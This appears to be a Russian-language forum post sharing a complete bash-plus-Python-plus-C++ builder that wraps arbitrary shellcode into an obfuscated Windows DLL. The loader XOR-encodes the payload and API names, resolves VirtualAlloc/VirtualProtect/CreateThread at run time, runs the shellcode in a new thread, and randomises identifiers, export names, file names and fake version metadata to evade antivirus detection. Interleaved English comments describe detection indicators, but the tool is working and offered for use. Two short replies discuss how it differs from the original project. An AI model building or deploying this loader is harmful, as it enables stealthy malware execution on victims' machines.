Charlotte.dll || custom ;-)

x4k

Решил не отставать от моды и на коленке зае@шил враппер на тему ;-) Без лишних слов, к делу)



Bash:
#!/bin/bash

# Copy the caller-supplied shellcode blob (argv[1]) to the fixed temp path that the
# embedded Python builder reads, and pick a random output file name from a remote
# list. NOTE(review): the name comes from a network fetch at build time, so the
# output name is neither reproducible nor under local control; a failed fetch
# leaves $rndname empty.
cp "$1" /tmp/shellcode.bin ; rndname="$(curl -s https://gitlab.com/x4k/pub/-/raw/master/names.txt | shuf -n1)"

cat<<'EOF'>/tmp/source.cpp
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#pragma comment (lib, "user32.lib")

// Placeholders: the builder (conv.py) replaces each empty initializer with a
// key-encoded byte array. The first holds the payload blob, the other four hold
// the Win32 API names that are resolved at run time.
unsigned char calc_payload[] = { };
unsigned char virtual_alloc[] = { };
unsigned char virtual_protect[] = { };
unsigned char createthread[] = { };
unsigned char waitforsingleobject[] = { };

// Byte counts of the arrays above.
unsigned int calc_len = sizeof(calc_payload);
unsigned int va_len = sizeof(virtual_alloc);
unsigned int vp_len = sizeof(virtual_protect);
unsigned int ct_len = sizeof(createthread);
unsigned int wfso_len = sizeof(waitforsingleobject);

// Per-buffer keys, also written in by the builder as plain C string literals.
// Key and encoded data sit side by side in the image, so the API names and the
// payload can be recovered statically from the binary.
char pl_key[] = "";
char va_key[] = "";
char vp_key[] = "";
char ct_key[] = "";
char wfso_key[] = "";

// Function-pointer slots filled through GetProcAddress at run time rather than
// through the import table.
LPVOID (WINAPI * pVirtualAlloc)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
BOOL (WINAPI * pVirtualProtect)(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect);
HANDLE (WINAPI * pCreateThread)(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, __drv_aliasesMem LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId);
DWORD (WINAPI * pWaitForSingleObject)(HANDLE hHandle, DWORD dwMilliseconds);

// In-place repeating-key byte xor used to decode the builder-filled arrays.
// key_len is sizeof() of a NUL-terminated string literal, so the key index wraps
// one slot before the terminator and only the letter bytes of the key are used.
// Because the buffer is rewritten in place, the decoded content stays in the
// module's memory for the rest of the process lifetime (relevant for memory
// scanning and forensics).
void XOR(char * data, size_t data_len, char * key, size_t key_len) {
        int j;

        j = 0;
        for (int i = 0; i < data_len; i++) {
                if (j == key_len - 1) j = 0;  // wrap before the NUL terminator

                data[i] = data[i] ^ key[j];
                j++;
        }
}

// DllMain is a no-op for every notification reason: merely loading the DLL does
// nothing. All behaviour lives in the single exported function below, so a host
// process has to load the module and call that export explicitly.
BOOL APIENTRY DllMain(HMODULE hModule,  DWORD  ul_reason_for_call, LPVOID lpReserved) {

    switch (ul_reason_for_call)  {
    case DLL_PROCESS_ATTACH:
    case DLL_PROCESS_DETACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
        break;
    }
    return TRUE;
}

extern "C" {
// Single exported entry point (the builder renames it to a random identifier).
// Runs the embedded payload inside the calling process:
//   decode an API name -> resolve it from kernel32 by string -> allocate RW
//   memory -> copy the decoded payload in -> flip the region to RX -> start a
//   thread at its base -> block forever.
// Detection/risk notes: a private RW->RX protection change followed by a thread
// whose start address lies in that non-image-backed region is the classic
// self-injection pattern that API-hooking and memory-scanning telemetry flags;
// GetModuleHandle is called with the plain "kernel32.dll" string, and each
// decoded name remains in memory after its call.
__declspec(dllexport) BOOL WINAPI RunME(void) {

    void * exec_mem;
    BOOL rvba;
    HANDLE thba;
        DWORD oldprotect = 0;

        // Decode the first API name in place, then resolve it by string.
        XOR((char *) virtual_alloc, va_len, va_key, sizeof(va_key));

    pVirtualAlloc = GetProcAddress(GetModuleHandle("kernel32.dll"), virtual_alloc);
    // Reserve and commit a writable, not yet executable, region sized to the payload.
    exec_mem = pVirtualAlloc(0, calc_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    // Decode the payload in place and copy it into the new region.
    XOR((char *) calc_payload, calc_len, pl_key, sizeof(pl_key));

    RtlMoveMemory(exec_mem, calc_payload, calc_len);

        XOR((char *) virtual_protect, vp_len, vp_key, sizeof(vp_key));

    // Switch the region from RW to RX; the previous protection value is stored
    // in a local and never restored.
    pVirtualProtect = GetProcAddress(GetModuleHandle("kernel32.dll"), virtual_protect);
    rvba = pVirtualProtect(exec_mem, calc_len, PAGE_EXECUTE_READ, &oldprotect);

    // Only if the protection change succeeded: start a thread at the region's
    // base address and block the caller indefinitely (-1 as DWORD is INFINITE).
    if ( rvba != 0 ) {
                XOR((char *) createthread, ct_len, ct_key, sizeof(ct_key));
                pCreateThread = GetProcAddress(GetModuleHandle("kernel32.dll"), createthread);
            thba = pCreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
                XOR((char *) waitforsingleobject, wfso_len, wfso_key, sizeof(wfso_key));
            pWaitForSingleObject = GetProcAddress(GetModuleHandle("kernel32.dll"), waitforsingleobject);
            pWaitForSingleObject(thba, -1);
    }
    return TRUE;
    }
}
EOF

cat<<'EOF'>/tmp/resource.rc
// Version resource compiled by windres and linked into the DLL. Every field is
// fictitious ("Horns and Hooves" is a literary joke company) and the internal /
// original file name placeholder is stamped by the wrapper script with the random
// output name. Treat this metadata as attacker-controlled: it says nothing about
// provenance; only a valid code signature would.
#define VER_FILEVERSION         31,3,3,7
#define VER_FILEVERSION_STR     "31,3,3,7\0"
#define VER_PRODUCTVERSION          3,10,0,0
#define VER_PRODUCTVERSION_STR      "3.10\0"

#ifndef DEBUG
#define VER_DEBUG                   0
#else
#define VER_DEBUG                   VS_FF_DEBUG
#endif

VS_VERSION_INFO VERSIONINFO
FILEVERSION     VER_FILEVERSION
PRODUCTVERSION  VER_PRODUCTVERSION
BEGIN
    BLOCK "StringFileInfo"
    BEGIN
        BLOCK "040904E4"
        BEGIN
                VALUE "CompanyName", "Horns and Hooves Inc."
                VALUE "FileDescription", "Win32 Test DLL"
                VALUE "FileVersion", "31.3.3.7"
                VALUE "InternalName", "RNDNAME"
                VALUE "LegalCopyright", "CopyRight ©2021 Horns and Hooves Inc."
                VALUE "OriginalFilename", "RNDNAME.dll"
                VALUE "ProductName", "Win32 Test DLL"
                VALUE "ProductVersion", "31.3.3.7"
        END
  END
  BLOCK "VarFileInfo"
  BEGIN
    VALUE "Translation", 0x809, 1200
  END
END
EOF

cat<<'EOF'>/tmp/conv.py
#!/bin/python3
import sys
import random
import string
import os
import time

def get_random_string() -> str:
    """Return 8-15 random ASCII letters.

    Used for every generated identifier, the export name and the xor keys, so
    the built DLL's exported function name and its embedded key strings are
    random letter sequences of this length -- a handy triage indicator.
    """
    length = random.randint(8, 15)
    result_str = ''.join(random.choice(string.ascii_letters) for i in range(length))
    return result_str

def xor(data):
    """Encode *data* with a fresh random repeating key and render it as a C array.

    `data` may be bytes (the payload file) or str (an API name); each element is
    combined with the key character at the same index modulo the key length.
    Returns a tuple of the C initializer text ("{ 0x.., ... };") and the key,
    which the caller writes into the template as a plain C string. Nothing here
    is secret: the key ships inside the binary next to the data, so this is
    obfuscation, not encryption.
    """
    key = get_random_string()
    l = len(key)
    output_str = ""
    for i in range(len(data)):
        current = data[i]
        current_key = key[i % len(key)]
        # Indexing bytes yields an int, indexing str yields a 1-char str;
        # normalise both to an int code point before combining.
        o = lambda x: x if isinstance(x, int) else ord(x)
        output_str += chr(o(current) ^ ord(current_key))
    ciphertext = '{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in output_str) + ' };'
    return ciphertext, key

def converter():
    """Render /tmp/source.cpp into /tmp/out.cpp with the payload baked in.

    Reads the shellcode blob from the fixed temp path, encodes the blob and the
    four Win32 API names with separate random keys, then rewrites the template:
    the empty placeholders receive the encoded arrays and key strings, and every
    internal identifier (including the exported function name) is renamed to a
    random string, so each build differs in export name, strings and array
    contents. Returns the new export name.
    """
    try:
        plaintext = open("/tmp/shellcode.bin", "rb").read()
    except:

        # Any read failure (missing or unreadable blob) ends the build silently.
        sys.exit(1)

    # Plain-text API names to encode; they never appear verbatim in the output.
    f1 = "VirtualAlloc"
    f2 = "VirtualProtect"
    f3 = "CreateThread"
    f4 = "WaitForSingleObject"

    # One random identifier per template symbol; e1 becomes the export name.
    e1 = get_random_string()
    calc_name = get_random_string()
    va_name = get_random_string()
    vp_name = get_random_string()
    ct_name = get_random_string()
    wfso_name = get_random_string()

    pl_key_name = get_random_string()
    va_key_name = get_random_string()
    vp_key_name = get_random_string()
    ct_key_name = get_random_string()
    wfso_key_name = get_random_string()

    pl_key_size = get_random_string()
    va_key_size = get_random_string()
    vp_key_size = get_random_string()
    ct_key_size = get_random_string()
    wfso_key_size = get_random_string()

    pva = get_random_string()
    pvp = get_random_string()
    pct = get_random_string()
    pwfso = get_random_string()

    p_execmem = get_random_string()
    p_rvba = get_random_string()
    p_thba = get_random_string()
    p_oldprotect = get_random_string()

    xor_name = get_random_string()

    # Encode the blob and the four API names, each with its own key.
    ciphertext, pl_key = xor(plaintext)
    ciphertext1, va_key = xor(f1)
    ciphertext2, vp_key = xor(f2)
    ciphertext3, ct_key = xor(f3)
    ciphertext4, wfso_key = xor(f4)

    template = open("/tmp/source.cpp", "rt")

    data = template.read()

    data = data.replace('RunME', e1)

    # The placeholders are matched as whole declarations first, before the
    # identifiers inside them are renamed further down.
    data = data.replace('unsigned char calc_payload[] = { };', 'unsigned char calc_payload[] = ' + ciphertext)
    data = data.replace('unsigned char virtual_alloc[] = { };', 'unsigned char virtual_alloc[] = ' + ciphertext1)
    data = data.replace('unsigned char virtual_protect[] = { };', 'unsigned char virtual_protect[] = ' + ciphertext2)
    data = data.replace('unsigned char createthread[] = { };', 'unsigned char createthread[] = ' + ciphertext3)
    data = data.replace('unsigned char waitforsingleobject[] = { };', 'unsigned char waitforsingleobject[] = ' + ciphertext4)

    # Keys are embedded as plain C string literals.
    data = data.replace('char pl_key[] = "";', 'char pl_key[] = "' + pl_key + '";')
    data = data.replace('char va_key[] = "";', 'char va_key[] = "' + va_key + '";')
    data = data.replace('char vp_key[] = "";', 'char vp_key[] = "' + vp_key + '";')
    data = data.replace('char ct_key[] = "";', 'char ct_key[] = "' + ct_key + '";')
    data = data.replace('char wfso_key[] = "";', 'char wfso_key[] = "' + wfso_key + '";')

    # Rename every remaining template identifier (substring replacement).
    data = data.replace('calc_payload', calc_name)
    data = data.replace('virtual_alloc', va_name)
    data = data.replace('virtual_protect', vp_name)
    data = data.replace('createthread', ct_name)
    data = data.replace('waitforsingleobject', wfso_name)

    data = data.replace('pl_key', pl_key_name)
    data = data.replace('va_key', va_key_name)
    data = data.replace('vp_key', vp_key_name)
    data = data.replace('ct_key', ct_key_name)
    data = data.replace('wfso_key', wfso_key_name)

    data = data.replace('calc_len', pl_key_size)
    data = data.replace('va_len', va_key_size)
    data = data.replace('vp_len', vp_key_size)
    data = data.replace('ct_len', ct_key_size)
    data = data.replace('wfso_len', wfso_key_size)

    data = data.replace('pVirtualAlloc', pva)
    data = data.replace('pVirtualProtect', pvp)
    data = data.replace('pCreateThread', pct)
    data = data.replace('pWaitForSingleObject', pwfso)

    data = data.replace('exec_mem', p_execmem)
    data = data.replace('rvba', p_rvba)
    data = data.replace('thba', p_thba)
    data = data.replace('oldprotect', p_oldprotect)

    data = data.replace('XOR', xor_name)

    template.close()
    template = open("/tmp/out.cpp", "w+")
    template.write(data)
    template.close
    return e1

def main():
    """Build the DLL from the rendered template and remove the working files.

    Steps: render the template (exit status 1 on failure), compile the version
    resource with windres, cross-compile the DLL with MinGW g++ (compiler output
    is discarded), print the export name, then delete every intermediate file
    in /tmp including the copied shellcode blob.
    """
    try:
        e1 = converter()
    except:
        sys.exit(1)
        print("[!!!] Ошибка :(")

    try:
        os.system("x86_64-w64-mingw32-windres -i /tmp/resource.rc -o /tmp/resource.o")
        os.system("x86_64-w64-mingw32-g++ -O3 -shared -o /tmp/RNDNAME.dll /tmp/out.cpp /tmp/resource.o -fpermissive >/dev/null 2>&1")
        print("Готово! ep: " + e1)
    except:
        print("[!!!] Ошибочка :(")
    # Cleanup leaves only the built DLL behind in /tmp.
    os.system("rm /tmp/out.cpp /tmp/source.cpp /tmp/resource.o /tmp/resource.rc /tmp/shellcode.bin")

# Script entry: run once by the wrapper shell script, which deletes this file afterwards.
if __name__ == "__main__":
    main()
EOF

# Stamp the chosen random name into the builder and the resource script, run the
# builder once and delete it; the other temp files are removed by the builder itself.
sed -i "s+RNDNAME+$rndname+g" /tmp/conv.py ; sed -i "s+RNDNAME+$rndname+g" /tmp/resource.rc ; python3 /tmp/conv.py ; rm /tmp/conv.py
# Show where the output landed (ls++ when installed, plain ls otherwise).
printf "\033[1;37mФайлы тут => " ; if [ -n "$(type ls++)" ] ; then ls++ /tmp/"$rndname".dll ; else ls --color=always -al /tmp/"$rndname".dll ; fi

chmod +x convert (так назовем, предположим) ; mv convert /usr/local/bin ; convert /path/to/any.bin
Всем хорошего настроения ;-)
Не вижу ни одной правки от оригинала https://github.com/9emin1/charlotte. VersionInfo только добавил?
ну ты внимательней глянь. во-первых, я написал, что это wrapper — значение слова глянь в большой советской. отличие: ты задаёшь напрямую путь к шеллкоду и получаешь готовую dll с рандомным именем. а так, буду рад увидеть твои статьи, мб чему-то научусь ;-)